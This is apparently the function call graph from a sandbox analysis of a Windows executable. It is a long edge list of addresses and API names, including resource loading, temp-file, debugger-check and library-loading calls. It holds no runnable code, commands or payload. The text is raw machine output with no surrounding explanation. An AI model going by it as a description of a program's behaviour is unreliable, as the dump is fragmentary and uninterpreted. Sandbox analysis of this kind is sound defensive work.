104684->104685 104780 e22d40 104685->104780 104686 e22d40 __cinit 67 API calls 104686->104691 104688 e43b26 104688->104608 104689 e69e4a 89 API calls 104689->104706 104690 e084c0 69 API calls 104690->104706 104691->104682 104691->104686 104691->104688 104692 e0e95a 104691->104692 104691->104706 104692->104706 104783 e69e4a 89 API calls 4 library calls 104692->104783 104695 e09ea0 331 API calls 104695->104706 104699 e08d40 59 API calls 104699->104706 104703 e43e25 104703->104608 104704 e0f195 104787 e69e4a 89 API calls 4 library calls 104704->104787 104705 e0ea78 104705->104608 104706->104689 104706->104690 104706->104695 104706->104699 104706->104704 104706->104705 104778 e07f77 59 API calls 2 library calls 104706->104778 104784 e56e8f 59 API calls 104706->104784 104785 e7c5c3 331 API calls 104706->104785 104786 e7b53c 331 API calls Mailbox 104706->104786 104788 e09c90 59 API calls Mailbox 104706->104788 104789 e793c6 331 API calls Mailbox 104706->104789 104708 e0f650 104707->104708 104709 e0f4ba 104707->104709 104712 e07de1 59 API calls 104708->104712 104710 e0f4c6 104709->104710 104711 e4441e 104709->104711 104966 e0f290 331 API calls 2 library calls 104710->104966 104968 e7bc6b 104711->104968 104718 e0f58c Mailbox 104712->104718 104715 e4442c 104719 e0f630 104715->104719 105008 e69e4a 89 API calls 4 library calls 104715->105008 104717 e0f4fd 104717->104715 104717->104718 104717->104719 104868 e04e4a 104718->104868 104874 e7445a 104718->104874 104883 e6cb7a 104718->104883 104963 e63c37 104718->104963 104719->104608 104721 e0f5e3 104721->104719 104967 e09c90 59 API calls Mailbox 104721->104967 104727 e03212 104726->104727 104729 e031e0 104726->104729 104727->104608 104728 e03205 IsDialogMessageW 104728->104727 104728->104729 104729->104727 104729->104728 104730 e3cf32 GetClassLongW 104729->104730 104730->104728 104730->104729 104731->104608 104732->104542 104733->104547 104734->104608 104735->104549 104736->104549 104737->104549 104738->104608 104739->104608 
104740->104608 104742 e09851 104741->104742 104751 e0984b 104741->104751 104743 e09857 __itow 104742->104743 104744 e09899 104742->104744 104746 e3f5d3 __i64tow 104742->104746 104747 e3f4da 104742->104747 104749 e20db6 Mailbox 59 API calls 104743->104749 105849 e23698 83 API calls 3 library calls 104744->105849 104746->104746 104752 e20db6 Mailbox 59 API calls 104747->104752 104757 e3f552 Mailbox _wcscpy 104747->104757 104750 e09871 104749->104750 104750->104751 104753 e07de1 59 API calls 104750->104753 104751->104608 104755 e3f51f 104752->104755 104753->104751 104754 e20db6 Mailbox 59 API calls 104756 e3f545 104754->104756 104755->104754 104756->104757 104758 e07de1 59 API calls 104756->104758 105850 e23698 83 API calls 3 library calls 104757->105850 104758->104757 104759->104608 104760->104608 104761->104608 104763 e20db6 Mailbox 59 API calls 104762->104763 104764 e07688 104763->104764 104765 e20db6 Mailbox 59 API calls 104764->104765 104766 e07696 104765->104766 104766->104598 104767->104598 104768->104598 104770 e07df0 __NMSG_WRITE _memmove 104769->104770 104771 e20db6 Mailbox 59 API calls 104770->104771 104772 e07e2e 104771->104772 104772->104598 104773->104598 104774->104598 104775->104598 104776->104598 104777->104598 104778->104706 104779->104706 104790 e22c44 104780->104790 104782 e22d4b 104782->104691 104783->104706 104784->104706 104785->104706 104786->104706 104787->104703 104788->104706 104789->104706 104791 e22c50 __close 104790->104791 104798 e23217 104791->104798 104797 e22c77 __close 104797->104782 104815 e29c0b 104798->104815 104800 e22c59 104801 e22c88 DecodePointer DecodePointer 104800->104801 104802 e22c65 104801->104802 104803 e22cb5 104801->104803 104812 e22c82 104802->104812 104803->104802 104861 e287a4 59 API calls __close 104803->104861 104805 e22d18 EncodePointer EncodePointer 104805->104802 104806 e22cec 104806->104802 104811 e22d06 EncodePointer 104806->104811 104863 e28864 61 API calls 2 library calls 104806->104863 104807 e22cc7 
104807->104805 104807->104806 104862 e28864 61 API calls 2 library calls 104807->104862 104810 e22d00 104810->104802 104810->104811 104811->104805 104864 e23220 104812->104864 104816 e29c2f EnterCriticalSection 104815->104816 104817 e29c1c 104815->104817 104816->104800 104822 e29c93 104817->104822 104819 e29c22 104819->104816 104846 e230b5 58 API calls 3 library calls 104819->104846 104823 e29c9f __close 104822->104823 104824 e29cc0 104823->104824 104825 e29ca8 104823->104825 104833 e29ce1 __close 104824->104833 104850 e2881d 58 API calls __malloc_crt 104824->104850 104847 e2a16b 58 API calls 2 library calls 104825->104847 104828 e29cad 104848 e2a1c8 58 API calls 7 library calls 104828->104848 104829 e29cd5 104831 e29ceb 104829->104831 104832 e29cdc 104829->104832 104837 e29c0b __lock 58 API calls 104831->104837 104851 e28b28 58 API calls __getptd_noexit 104832->104851 104833->104819 104834 e29cb4 104849 e2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104834->104849 104839 e29cf2 104837->104839 104840 e29d17 104839->104840 104841 e29cff 104839->104841 104853 e22d55 104840->104853 104852 e29e2b InitializeCriticalSectionAndSpinCount 104841->104852 104844 e29d0b 104859 e29d33 LeaveCriticalSection _doexit 104844->104859 104847->104828 104848->104834 104850->104829 104851->104833 104852->104844 104854 e22d87 _free 104853->104854 104855 e22d5e RtlFreeHeap 104853->104855 104854->104844 104855->104854 104856 e22d73 104855->104856 104860 e28b28 58 API calls __getptd_noexit 104856->104860 104858 e22d79 GetLastError 104858->104854 104859->104833 104860->104858 104861->104807 104862->104806 104863->104810 104867 e29d75 LeaveCriticalSection 104864->104867 104866 e22c87 104866->104797 104867->104866 104869 e04e54 104868->104869 104870 e04e5b 104868->104870 105009 e253a6 104869->105009 104872 e04e6a 104870->104872 104873 e04e7b FreeLibrary 104870->104873 104872->104721 104873->104872 104875 e09837 84 API calls 104874->104875 104876 e74494 104875->104876 
105279 e06240 104876->105279 104878 e744a4 104879 e744c9 104878->104879 104880 e09ea0 331 API calls 104878->104880 104882 e744cd 104879->104882 105304 e09a98 59 API calls Mailbox 104879->105304 104880->104879 104882->104721 104884 e07667 59 API calls 104883->104884 104885 e6cbaf 104884->104885 104886 e07667 59 API calls 104885->104886 104887 e6cbb8 104886->104887 104888 e6cbcc 104887->104888 105523 e09b3c 59 API calls 104887->105523 104890 e09837 84 API calls 104888->104890 104891 e6cbe9 104890->104891 104892 e6ccea 104891->104892 104893 e6cc0b 104891->104893 104905 e6cd1a Mailbox 104891->104905 105327 e04ddd 104892->105327 104894 e09837 84 API calls 104893->104894 104896 e6cc17 104894->104896 104898 e08047 59 API calls 104896->104898 104901 e6cc23 104898->104901 104899 e6cd16 104900 e07667 59 API calls 104899->104900 104899->104905 104903 e6cd4b 104900->104903 104907 e6cc37 104901->104907 104908 e6cc69 104901->104908 104902 e04ddd 136 API calls 104902->104899 104904 e07667 59 API calls 104903->104904 104906 e6cd54 104904->104906 104905->104721 104910 e07667 59 API calls 104906->104910 104911 e08047 59 API calls 104907->104911 104909 e09837 84 API calls 104908->104909 104912 e6cc76 104909->104912 104913 e6cd5d 104910->104913 104914 e6cc47 104911->104914 104915 e08047 59 API calls 104912->104915 104916 e07667 59 API calls 104913->104916 105524 e07cab 104914->105524 104918 e6cc82 104915->104918 104919 e6cd66 104916->104919 105531 e64a31 GetFileAttributesW 104918->105531 104923 e09837 84 API calls 104919->104923 104921 e09837 84 API calls 104924 e6cc5d 104921->104924 104926 e6cd73 104923->104926 104927 e07b2e 59 API calls 104924->104927 104925 e6cc8b 104928 e6cc9e 104925->104928 104931 e079f2 59 API calls 104925->104931 105351 e0459b 104926->105351 104927->104908 104930 e09837 84 API calls 104928->104930 104938 e6cca4 104928->104938 104933 e6cccb 104930->104933 104931->104928 104932 e6cd8e 105402 e079f2 104932->105402 105532 e637ef 75 API calls Mailbox 104933->105532 
104937 e6cdd1 104940 e08047 59 API calls 104937->104940 104938->104905 104939 e079f2 59 API calls 104941 e6cdae 104939->104941 104942 e6cddf 104940->104942 104941->104937 105533 e07bcc 104941->105533 105405 e07b2e 104942->105405 104946 e6cdc3 104948 e07bcc 59 API calls 104946->104948 104947 e07b2e 59 API calls 104949 e6cdfb 104947->104949 104948->104937 104950 e07b2e 59 API calls 104949->104950 104951 e6ce09 104950->104951 104952 e09837 84 API calls 104951->104952 104953 e6ce15 104952->104953 105414 e64071 104953->105414 104955 e6ce26 104956 e63c37 3 API calls 104955->104956 104957 e6ce30 104956->104957 104958 e09837 84 API calls 104957->104958 104962 e6ce61 104957->104962 104959 e6ce4e 104958->104959 105468 e69155 104959->105468 104961 e04e4a 84 API calls 104961->104905 104962->104961 105837 e6445a GetFileAttributesW 104963->105837 104966->104717 104967->104721 104969 e7bc96 104968->104969 104970 e7bcb0 104968->104970 105841 e69e4a 89 API calls 4 library calls 104969->105841 105842 e7a213 59 API calls Mailbox 104970->105842 104973 e7bcbb 104974 e09ea0 330 API calls 104973->104974 104975 e7bd1c 104974->104975 104976 e7bca8 Mailbox 104975->104976 104977 e7bdae 104975->104977 104980 e7bd5d 104975->104980 104976->104715 104978 e7be04 104977->104978 104979 e7bdb4 104977->104979 104978->104976 104981 e09837 84 API calls 104978->104981 105844 e6791a 59 API calls 104979->105844 105843 e672df 59 API calls Mailbox 104980->105843 104983 e7be16 104981->104983 104986 e07e4f 59 API calls 104983->104986 104984 e7bdd7 105845 e05d41 59 API calls Mailbox 104984->105845 104987 e7be3a CharUpperBuffW 104986->104987 104992 e7be54 104987->104992 104989 e7bd8d 104991 e0f460 330 API calls 104989->104991 104990 e7bddf Mailbox 104995 e0fce0 330 API calls 104990->104995 104991->104976 104993 e7bea7 104992->104993 104994 e7be5b 104992->104994 104996 e09837 84 API calls 104993->104996 105846 e672df 59 API calls Mailbox 104994->105846 104995->104976 104997 e7beaf 104996->104997 105847 e09e5d 60 
API calls 104997->105847 105000 e7be89 105001 e0f460 330 API calls 105000->105001 105001->104976 105002 e7beb9 105002->104976 105003 e09837 84 API calls 105002->105003 105004 e7bed4 105003->105004 105848 e05d41 59 API calls Mailbox 105004->105848 105006 e7bee4 105007 e0fce0 330 API calls 105006->105007 105007->104976 105008->104719 105010 e253b2 __close 105009->105010 105011 e253c6 105010->105011 105012 e253de 105010->105012 105044 e28b28 58 API calls __getptd_noexit 105011->105044 105019 e253d6 __close 105012->105019 105022 e26c11 105012->105022 105014 e253cb 105045 e28db6 9 API calls __close 105014->105045 105019->104870 105023 e26c43 EnterCriticalSection 105022->105023 105024 e26c21 105022->105024 105026 e253f0 105023->105026 105024->105023 105025 e26c29 105024->105025 105027 e29c0b __lock 58 API calls 105025->105027 105028 e2533a 105026->105028 105027->105026 105029 e25349 105028->105029 105030 e2535d 105028->105030 105090 e28b28 58 API calls __getptd_noexit 105029->105090 105042 e25359 105030->105042 105047 e24a3d 105030->105047 105033 e2534e 105091 e28db6 9 API calls __close 105033->105091 105039 e25377 105064 e30a02 105039->105064 105041 e2537d 105041->105042 105043 e22d55 _free 58 API calls 105041->105043 105046 e25415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105042->105046 105043->105042 105044->105014 105045->105019 105046->105019 105048 e24a50 105047->105048 105052 e24a74 105047->105052 105049 e246e6 __output_l 58 API calls 105048->105049 105048->105052 105050 e24a6d 105049->105050 105092 e2d886 105050->105092 105053 e30b77 105052->105053 105054 e25371 105053->105054 105055 e30b84 105053->105055 105057 e246e6 105054->105057 105055->105054 105056 e22d55 _free 58 API calls 105055->105056 105056->105054 105058 e246f0 105057->105058 105059 e24705 105057->105059 105234 e28b28 58 API calls __getptd_noexit 105058->105234 105059->105039 105061 e246f5 105235 e28db6 9 API calls __close 105061->105235 105063 e24700 105063->105039 105065 e30a0e __close 
105064->105065 105066 e30a32 105065->105066 105067 e30a1b 105065->105067 105069 e30abd 105066->105069 105071 e30a42 105066->105071 105251 e28af4 58 API calls __getptd_noexit 105067->105251 105256 e28af4 58 API calls __getptd_noexit 105069->105256 105070 e30a20 105252 e28b28 58 API calls __getptd_noexit 105070->105252 105074 e30a60 105071->105074 105075 e30a6a 105071->105075 105253 e28af4 58 API calls __getptd_noexit 105074->105253 105078 e2d206 ___lock_fhandle 59 API calls 105075->105078 105076 e30a65 105257 e28b28 58 API calls __getptd_noexit 105076->105257 105079 e30a70 105078->105079 105081 e30a83 105079->105081 105082 e30a8e 105079->105082 105236 e30add 105081->105236 105254 e28b28 58 API calls __getptd_noexit 105082->105254 105083 e30ac9 105258 e28db6 9 API calls __close 105083->105258 105086 e30a27 __close 105086->105041 105088 e30a89 105255 e30ab5 LeaveCriticalSection __unlock_fhandle 105088->105255 105090->105033 105091->105042 105093 e2d892 __close 105092->105093 105094 e2d8b6 105093->105094 105095 e2d89f 105093->105095 105097 e2d955 105094->105097 105099 e2d8ca 105094->105099 105193 e28af4 58 API calls __getptd_noexit 105095->105193 105199 e28af4 58 API calls __getptd_noexit 105097->105199 105098 e2d8a4 105194 e28b28 58 API calls __getptd_noexit 105098->105194 105102 e2d8f2 105099->105102 105103 e2d8e8 105099->105103 105120 e2d206 105102->105120 105195 e28af4 58 API calls __getptd_noexit 105103->105195 105106 e2d8ed 105200 e28b28 58 API calls __getptd_noexit 105106->105200 105107 e2d8f8 105109 e2d90b 105107->105109 105110 e2d91e 105107->105110 105129 e2d975 105109->105129 105196 e28b28 58 API calls __getptd_noexit 105110->105196 105111 e2d961 105201 e28db6 9 API calls __close 105111->105201 105115 e2d917 105198 e2d94d LeaveCriticalSection __unlock_fhandle 105115->105198 105116 e2d8ab __close 105116->105052 105117 e2d923 105197 e28af4 58 API calls __getptd_noexit 105117->105197 105121 e2d212 __close 105120->105121 105122 e2d261 EnterCriticalSection 
105121->105122 105123 e29c0b __lock 58 API calls 105121->105123 105124 e2d287 __close 105122->105124 105125 e2d237 105123->105125 105124->105107 105126 e2d24f 105125->105126 105202 e29e2b InitializeCriticalSectionAndSpinCount 105125->105202 105203 e2d28b LeaveCriticalSection _doexit 105126->105203 105130 e2d982 __ftell_nolock 105129->105130 105131 e2d9e0 105130->105131 105132 e2d9c1 105130->105132 105162 e2d9b6 105130->105162 105136 e2da38 105131->105136 105137 e2da1c 105131->105137 105213 e28af4 58 API calls __getptd_noexit 105132->105213 105135 e2d9c6 105214 e28b28 58 API calls __getptd_noexit 105135->105214 105140 e2da51 105136->105140 105219 e318c1 60 API calls 3 library calls 105136->105219 105216 e28af4 58 API calls __getptd_noexit 105137->105216 105138 e2e1d6 105138->105115 105204 e35c6b 105140->105204 105142 e2d9cd 105215 e28db6 9 API calls __close 105142->105215 105145 e2da21 105217 e28b28 58 API calls __getptd_noexit 105145->105217 105147 e2da5f 105149 e2ddb8 105147->105149 105220 e299ac 58 API calls 2 library calls 105147->105220 105151 e2ddd6 105149->105151 105152 e2e14b WriteFile 105149->105152 105150 e2da28 105218 e28db6 9 API calls __close 105150->105218 105155 e2defa 105151->105155 105160 e2ddec 105151->105160 105156 e2ddab GetLastError 105152->105156 105164 e2dd78 105152->105164 105167 e2df05 105155->105167 105170 e2dfef 105155->105170 105156->105164 105157 e2da8b GetConsoleMode 105157->105149 105159 e2daca 105157->105159 105158 e2e184 105158->105162 105225 e28b28 58 API calls __getptd_noexit 105158->105225 105159->105149 105165 e2dada GetConsoleCP 105159->105165 105160->105158 105161 e2de5b WriteFile 105160->105161 105161->105156 105166 e2de98 105161->105166 105227 e2c5f6 105162->105227 105164->105158 105164->105162 105169 e2ded8 105164->105169 105165->105158 105189 e2db09 105165->105189 105166->105160 105172 e2debc 105166->105172 105167->105158 105173 e2df6a WriteFile 105167->105173 105168 e2e1b2 105226 e28af4 58 API calls __getptd_noexit 
105168->105226 105175 e2dee3 105169->105175 105176 e2e17b 105169->105176 105170->105158 105171 e2e064 WideCharToMultiByte 105170->105171 105171->105156 105185 e2e0ab 105171->105185 105172->105164 105173->105156 105177 e2dfb9 105173->105177 105222 e28b28 58 API calls __getptd_noexit 105175->105222 105224 e28b07 58 API calls 2 library calls 105176->105224 105177->105164 105177->105167 105177->105172 105180 e2e0b3 WriteFile 105183 e2e106 GetLastError 105180->105183 105180->105185 105181 e2dee8 105223 e28af4 58 API calls __getptd_noexit 105181->105223 105183->105185 105185->105164 105185->105170 105185->105172 105185->105180 105186 e2dbf2 WideCharToMultiByte 105186->105164 105188 e2dc2d WriteFile 105186->105188 105187 e362ba 60 API calls __write_nolock 105187->105189 105188->105156 105191 e2dc5f 105188->105191 105189->105164 105189->105186 105189->105187 105189->105191 105221 e235f5 58 API calls __isleadbyte_l 105189->105221 105190 e37a5e WriteConsoleW CreateFileW __putwch_nolock 105190->105191 105191->105156 105191->105164 105191->105189 105191->105190 105192 e2dc87 WriteFile 105191->105192 105192->105156 105192->105191 105193->105098 105194->105116 105195->105106 105196->105117 105197->105115 105198->105116 105199->105106 105200->105111 105201->105116 105202->105126 105203->105122 105205 e35c83 105204->105205 105206 e35c76 105204->105206 105208 e35c8f 105205->105208 105209 e28b28 __close 58 API calls 105205->105209 105207 e28b28 __close 58 API calls 105206->105207 105210 e35c7b 105207->105210 105208->105147 105211 e35cb0 105209->105211 105210->105147 105212 e28db6 __close 9 API calls 105211->105212 105212->105210 105213->105135 105214->105142 105215->105162 105216->105145 105217->105150 105218->105162 105219->105140 105220->105157 105221->105189 105222->105181 105223->105162 105224->105162 105225->105168 105226->105162 105228 e2c600 IsProcessorFeaturePresent 105227->105228 105229 e2c5fe 105227->105229 105231 e3590a 105228->105231 105229->105138 105232 e358b9 
___raise_securityfailure 5 API calls 105231->105232 105233 e359ed 105232->105233 105233->105138 105234->105061 105235->105063 105259 e2d4c3 105236->105259 105238 e30aeb 105239 e30b41 105238->105239 105241 e30b1f 105238->105241 105244 e2d4c3 __lseeki64_nolock 58 API calls 105238->105244 105272 e2d43d 59 API calls __close 105239->105272 105241->105239 105242 e2d4c3 __lseeki64_nolock 58 API calls 105241->105242 105245 e30b2b CloseHandle 105242->105245 105243 e30b49 105246 e30b6b 105243->105246 105273 e28b07 58 API calls 2 library calls 105243->105273 105247 e30b16 105244->105247 105245->105239 105249 e30b37 GetLastError 105245->105249 105246->105088 105248 e2d4c3 __lseeki64_nolock 58 API calls 105247->105248 105248->105241 105249->105239 105251->105070 105252->105086 105253->105076 105254->105088 105255->105086 105256->105076 105257->105083 105258->105086 105260 e2d4e3 105259->105260 105261 e2d4ce 105259->105261 105265 e2d508 105260->105265 105276 e28af4 58 API calls __getptd_noexit 105260->105276 105274 e28af4 58 API calls __getptd_noexit 105261->105274 105264 e2d4d3 105275 e28b28 58 API calls __getptd_noexit 105264->105275 105265->105238 105266 e2d512 105277 e28b28 58 API calls __getptd_noexit 105266->105277 105269 e2d4db 105269->105238 105270 e2d51a 105278 e28db6 9 API calls __close 105270->105278 105272->105243 105273->105246 105274->105264 105275->105269 105276->105266 105277->105270 105278->105269 105305 e07a16 105279->105305 105281 e0646a 105312 e0750f 105281->105312 105283 e06484 Mailbox 105283->104878 105286 e06265 105286->105281 105287 e3dff6 105286->105287 105288 e07d8c 59 API calls 105286->105288 105289 e06799 _memmove 105286->105289 105290 e0750f 59 API calls 105286->105290 105297 e3df92 105286->105297 105301 e07e4f 59 API calls 105286->105301 105310 e05f6c 60 API calls 105286->105310 105311 e05d41 59 API calls Mailbox 105286->105311 105320 e05e72 60 API calls 105286->105320 105321 e07924 59 API calls 2 library calls 105286->105321 105325 e5f8aa 91 API 
calls 4 library calls 105287->105325 105288->105286 105326 e5f8aa 91 API calls 4 library calls 105289->105326 105290->105286 105294 e3e004 105295 e0750f 59 API calls 105294->105295 105296 e3e01a 105295->105296 105296->105283 105322 e08029 105297->105322 105299 e3df9d 105303 e20db6 Mailbox 59 API calls 105299->105303 105302 e0643b CharUpperBuffW 105301->105302 105302->105286 105303->105289 105304->104882 105306 e20db6 Mailbox 59 API calls 105305->105306 105307 e07a3b 105306->105307 105308 e08029 59 API calls 105307->105308 105309 e07a4a 105308->105309 105309->105286 105310->105286 105311->105286 105313 e075af 105312->105313 105316 e07522 _memmove 105312->105316 105315 e20db6 Mailbox 59 API calls 105313->105315 105314 e20db6 Mailbox 59 API calls 105317 e07529 105314->105317 105315->105316 105316->105314 105318 e20db6 Mailbox 59 API calls 105317->105318 105319 e07552 105317->105319 105318->105319 105319->105283 105320->105286 105321->105286 105323 e20db6 Mailbox 59 API calls 105322->105323 105324 e08033 105323->105324 105324->105299 105325->105294 105326->105283 105542 e04bb5 105327->105542 105332 e3d8e6 105335 e04e4a 84 API calls 105332->105335 105333 e04e08 LoadLibraryExW 105552 e04b6a 105333->105552 105337 e3d8ed 105335->105337 105339 e04b6a 3 API calls 105337->105339 105341 e3d8f5 105339->105341 105340 e04e2f 105340->105341 105342 e04e3b 105340->105342 105578 e04f0b 105341->105578 105343 e04e4a 84 API calls 105342->105343 105345 e04e40 105343->105345 105345->104899 105345->104902 105348 e3d91c 105586 e04ec7 105348->105586 105352 e07667 59 API calls 105351->105352 105353 e045b1 105352->105353 105354 e07667 59 API calls 105353->105354 105355 e045b9 105354->105355 105356 e07667 59 API calls 105355->105356 105357 e045c1 105356->105357 105358 e07667 59 API calls 105357->105358 105359 e045c9 105358->105359 105360 e3d4d2 105359->105360 105361 e045fd 105359->105361 105362 e08047 59 API calls 105360->105362 105363 e0784b 59 API calls 105361->105363 105364 e3d4db 
[Call-graph residue: the sandbox's interactive function call graph for the sample survived extraction only as an edge list (numeric node id, function address, and the API or CRT routine names the sandbox attached to each node); the graph itself cannot be reproduced as text. Routine names labelled on the graph nodes, as recorded by the sandbox: LoadLibraryA, GetProcAddress, FreeLibrary, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, GetTempPathW, GetTempFileNameW, FindFirstFileW, FindClose, CreateFileW, ReadFile, VirtualAlloc, VirtualFree, GetPEB, Sleep, CreateThread, CloseHandle, GetSystemTimeAsFileTime, GetStdHandle, GetFileType, GetModuleFileNameW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetProcessHeap, RtlAllocateHeap, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetLongPathNameW, GetOpenFileNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, OleInitialize, IsThemeActive, SystemParametersInfoW, RegisterWindowMessageW, SetTimer, KillTimer, PostQuitMessage, DefWindowProcW, CreatePopupMenu, MoveWindow, SetFocus, DeleteObject, DestroyWindow, DestroyIcon, LoadStringW, Shell_NotifyIconW, MessageBoxA.]
1050da2 106928->106929 106929->106919 106930 e01016 106935 e04974 106930->106935 106933 e22d40 __cinit 67 API calls 106934 e01025 106933->106934 106936 e20db6 Mailbox 59 API calls 106935->106936 106937 e0497c 106936->106937 106938 e0101b 106937->106938 106942 e04936 106937->106942 106938->106933 106943 e04951 106942->106943 106944 e0493f 106942->106944 106946 e049a0 106943->106946 106945 e22d40 __cinit 67 API calls 106944->106945 106945->106943 106947 e07667 59 API calls 106946->106947 106948 e049b8 GetVersionExW 106947->106948 106949 e07bcc 59 API calls 106948->106949 106950 e049fb 106949->106950 106951 e07d2c 59 API calls 106950->106951 106960 e04a28 106950->106960 106952 e04a1c 106951->106952 106953 e07726 59 API calls 106952->106953 106953->106960 106954 e04a93 GetCurrentProcess IsWow64Process 106955 e04aac 106954->106955 106957 e04ac2 106955->106957 106958 e04b2b GetSystemInfo 106955->106958 106956 e3d864 106970 e04b37 106957->106970 106959 e04af8 106958->106959 106959->106938 106960->106954 106960->106956 106963 e04ad4 106965 e04b37 2 API calls 106963->106965 106964 e04b1f GetSystemInfo 106966 e04ae9 106964->106966 106967 e04adc GetNativeSystemInfo 106965->106967 106966->106959 106968 e04aef FreeLibrary 106966->106968 106967->106966 106968->106959 106971 e04ad0 106970->106971 106972 e04b40 LoadLibraryA 106970->106972 106971->106963 106971->106964 106972->106971 106973 e04b51 GetProcAddress 106972->106973 106973->106971 106974 e0be19 106975 e0c36a 106974->106975 106976 e0be22 106974->106976 106984 e0ba8b Mailbox 106975->106984 106989 e57bdb 59 API calls _memmove 106975->106989 106976->106975 106977 e09837 84 API calls 106976->106977 106978 e0be4d 106977->106978 106978->106975 106980 e0be5d 106978->106980 106982 e07a51 59 API calls 106980->106982 106981 e41085 106983 e08047 59 API calls 106981->106983 106982->106984 106983->106984 106986 e41361 106984->106986 106988 e0baab 106984->106988 106991 e08cd4 59 API calls Mailbox 106984->106991 106986->106988 106990 
e23d46 59 API calls __wtof_l 106986->106990 106989->106981 106990->106988 106991->106984 106992 e0107d 106997 e0708b 106992->106997 106994 e0108c 106995 e22d40 __cinit 67 API calls 106994->106995 106996 e01096 106995->106996 106998 e0709b __ftell_nolock 106997->106998 106999 e07667 59 API calls 106998->106999 107000 e07151 106999->107000 107001 e04706 61 API calls 107000->107001 107002 e0715a 107001->107002 107028 e2050b 107002->107028 107005 e07cab 59 API calls 107006 e07173 107005->107006 107007 e03f74 59 API calls 107006->107007 107008 e07182 107007->107008 107009 e07667 59 API calls 107008->107009 107010 e0718b 107009->107010 107011 e07d8c 59 API calls 107010->107011 107012 e07194 RegOpenKeyExW 107011->107012 107013 e3e8b1 RegQueryValueExW 107012->107013 107017 e071b6 Mailbox 107012->107017 107014 e3e943 RegCloseKey 107013->107014 107015 e3e8ce 107013->107015 107014->107017 107027 e3e955 _wcscat Mailbox __NMSG_WRITE 107014->107027 107016 e20db6 Mailbox 59 API calls 107015->107016 107018 e3e8e7 107016->107018 107017->106994 107019 e0522e 59 API calls 107018->107019 107020 e3e8f2 RegQueryValueExW 107019->107020 107021 e3e90f 107020->107021 107024 e3e929 107020->107024 107022 e07bcc 59 API calls 107021->107022 107022->107024 107023 e079f2 59 API calls 107023->107027 107024->107014 107025 e07de1 59 API calls 107025->107027 107026 e03f74 59 API calls 107026->107027 107027->107017 107027->107023 107027->107025 107027->107026 107029 e31940 __ftell_nolock 107028->107029 107030 e20518 GetFullPathNameW 107029->107030 107031 e2053a 107030->107031 107032 e07bcc 59 API calls 107031->107032 107033 e07165 107032->107033 107033->107005 107034 e3fdfc 107073 e0ab30 Mailbox _memmove 107034->107073 107036 e5617e Mailbox 59 API calls 107058 e0a057 107036->107058 107040 e0b525 107137 e69e4a 89 API calls 4 library calls 107040->107137 107041 e40055 107136 e69e4a 89 API calls 4 library calls 107041->107136 107042 e20db6 59 API calls Mailbox 107060 e09f37 Mailbox 107042->107060 107043 
e0b900 60 API calls 107043->107060 107044 e0b475 107049 e08047 59 API calls 107044->107049 107047 e08047 59 API calls 107047->107060 107048 e40064 107049->107058 107051 e0b47a 107051->107041 107062 e409e5 107051->107062 107054 e07667 59 API calls 107054->107060 107055 e56e8f 59 API calls 107055->107060 107056 e22d40 67 API calls __cinit 107056->107060 107057 e07de1 59 API calls 107057->107073 107059 e409d6 107141 e69e4a 89 API calls 4 library calls 107059->107141 107060->107041 107060->107042 107060->107043 107060->107044 107060->107047 107060->107051 107060->107054 107060->107055 107060->107056 107060->107058 107060->107059 107063 e0a55a 107060->107063 107130 e0c8c0 331 API calls 2 library calls 107060->107130 107142 e69e4a 89 API calls 4 library calls 107062->107142 107140 e69e4a 89 API calls 4 library calls 107063->107140 107064 e7bc6b 331 API calls 107064->107073 107066 e20db6 59 API calls Mailbox 107066->107073 107067 e0b2b6 107134 e0f6a3 331 API calls 107067->107134 107069 e09ea0 331 API calls 107069->107073 107070 e4086a 107138 e09c90 59 API calls Mailbox 107070->107138 107072 e40878 107139 e69e4a 89 API calls 4 library calls 107072->107139 107073->107040 107073->107057 107073->107058 107073->107060 107073->107064 107073->107066 107073->107067 107073->107069 107073->107070 107073->107072 107075 e4085c 107073->107075 107076 e0b21c 107073->107076 107080 e56e8f 59 API calls 107073->107080 107083 e7df37 107073->107083 107086 e7df23 107073->107086 107089 e7c2e0 107073->107089 107121 e67956 107073->107121 107127 e5617e 107073->107127 107131 e09c90 59 API calls Mailbox 107073->107131 107135 e7c193 85 API calls 2 library calls 107073->107135 107075->107036 107075->107058 107132 e09d3c 60 API calls Mailbox 107076->107132 107078 e0b22d 107133 e09d3c 60 API calls Mailbox 107078->107133 107080->107073 107143 e7cadd 107083->107143 107085 e7df47 107085->107073 107087 e7cadd 130 API calls 107086->107087 107088 e7df33 107087->107088 107088->107073 107090 e07667 59 API calls 
107089->107090 107091 e7c2f4 107090->107091 107092 e07667 59 API calls 107091->107092 107093 e7c2fc 107092->107093 107094 e07667 59 API calls 107093->107094 107095 e7c304 107094->107095 107096 e09837 84 API calls 107095->107096 107097 e7c312 107096->107097 107098 e7c528 Mailbox 107097->107098 107099 e07bcc 59 API calls 107097->107099 107100 e7c4fb 107097->107100 107102 e7c4e2 107097->107102 107104 e07924 59 API calls 107097->107104 107105 e7c4fd 107097->107105 107106 e08047 59 API calls 107097->107106 107111 e07e4f 59 API calls 107097->107111 107114 e07e4f 59 API calls 107097->107114 107118 e09837 84 API calls 107097->107118 107119 e07cab 59 API calls 107097->107119 107120 e07b2e 59 API calls 107097->107120 107098->107073 107099->107097 107100->107098 107235 e09a3c 59 API calls Mailbox 107100->107235 107103 e07cab 59 API calls 107102->107103 107107 e7c4ef 107103->107107 107104->107097 107108 e07cab 59 API calls 107105->107108 107106->107097 107109 e07b2e 59 API calls 107107->107109 107110 e7c50c 107108->107110 107109->107100 107113 e07b2e 59 API calls 107110->107113 107112 e7c3a9 CharUpperBuffW 107111->107112 107233 e0843a 68 API calls 107112->107233 107113->107100 107116 e7c469 CharUpperBuffW 107114->107116 107234 e0c5a7 69 API calls 2 library calls 107116->107234 107118->107097 107119->107097 107120->107097 107122 e67962 107121->107122 107123 e20db6 Mailbox 59 API calls 107122->107123 107124 e67970 107123->107124 107125 e6797e 107124->107125 107126 